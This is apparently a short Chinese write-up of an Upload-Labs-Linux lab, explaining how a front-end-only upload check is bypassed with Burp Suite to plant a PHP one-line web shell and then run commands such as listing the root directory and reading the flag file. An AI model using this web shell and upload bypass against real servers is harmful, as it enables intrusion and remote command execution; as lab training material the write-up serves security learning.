Upload-Labs-Linux

文件上传漏洞

这里上传文件我们可以打开检查,可以看到该页面对上传文件做了相关的限定,但是只是在前端页面进行了相关的验证,后端不知道,但是我们可以试试绕过前端的校验,可以在设置中禁用javascript,也可以进行burpsuite进行抓包

这里使用抓包,上传的文件木马为获取该服务器的cmd权限

这里的校验为前端,我们上传木马文件

<?php @eval($_GET'cmd');?>木马文件需要后缀为jpg,这里使用burpsuite抓包后修改后缀后在发送

这里发送完成后就可以访问服务器了

检查一下是否拥有权限

核心代码

?cmd=phpinfo();

权限拥有,找到flag只需要查看该服务器的文件目录

核心代码

?cmd=system('ls /');

查看flag就好了

?cmd=system('cat /flag');

相关推荐
Fnetlink17 小时前
Fnet 云网安 260904
网络·人工智能·安全·web安全·网络安全
TechWayfarer9 小时前
Cloudflare 9·15新政倒计时:用IP风险画像识别AI爬虫,防止误伤Googlebot
网络·人工智能·爬虫·python·tcp/ip·网络安全
ynm11110 小时前
2026.8.31(2)【AES】MRCTF2020 Unravel!!
网络安全·buuctf·青少年ctf
三84412 小时前
SSRF 从入门到实战:原理、危害与基础利用
服务器·网络安全·ssrf·#web安全
小小小小钰儿12 小时前
1.2-AI核心理论与术语
人工智能·计算机·网络安全·信息安全·程序员·编程
聚美智数12 小时前
网安查询-备案查询-网络安全查询API接口介绍
网络·数据库·web安全
迪康Defender15 小时前
迪康端点安全一体化管理系统文档安全:构建企业文档资产全链路防护体系
运维·网络·安全·web安全·终端安全管理
其实防守也摸鱼20 小时前
教育信息技术应用创新---基础软件信息赛(题库)
大数据·运维·人工智能·web安全·自动化
学逆向的21 小时前
扩展PE头属性说明
开发语言·网络安全·pe
一只鹿鹿鹿21 小时前
水利信息化建设项目物联网(视频监控系统)施工方案(Word)
物联网·安全·web安全·系统安全